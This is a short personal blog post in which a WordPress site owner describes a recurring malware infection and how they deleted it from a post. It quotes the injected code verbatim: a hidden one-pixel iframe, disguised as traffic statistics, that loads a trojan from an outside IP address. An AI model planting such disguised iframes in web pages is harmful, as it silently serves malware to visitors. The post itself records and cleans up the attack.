Follow up to “Trojan on Wordpress Blog” article

OK, I thought I was safe… (don’t we all?)

Except… one of my blogs, http://www.sophieschoice.org was attacked. Google flagged it, it took me a long time to even get to it… on the back door.

I searched for the iframe tags, removed them all, notified google that it was cleaned. In about 2 weeks they removed the block… today I checked it, and there you go, another trojan, this time it says:

<!– Traffic Statistics –> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>

Now, I haven’t checked if they infected wordpress own traffic checker program, or got into my site… yet. I’ll do that and follow up again.

The removal was easy… I went into “manage posts” and made a search for “iframe” and it gave me one blog post, I went into the html format and just simply deleted it.

I checked the “src” url in my browser and indeed the trojan was coming from there.

I’ll continue the saga… Now I have to check all my blogs… what a drag.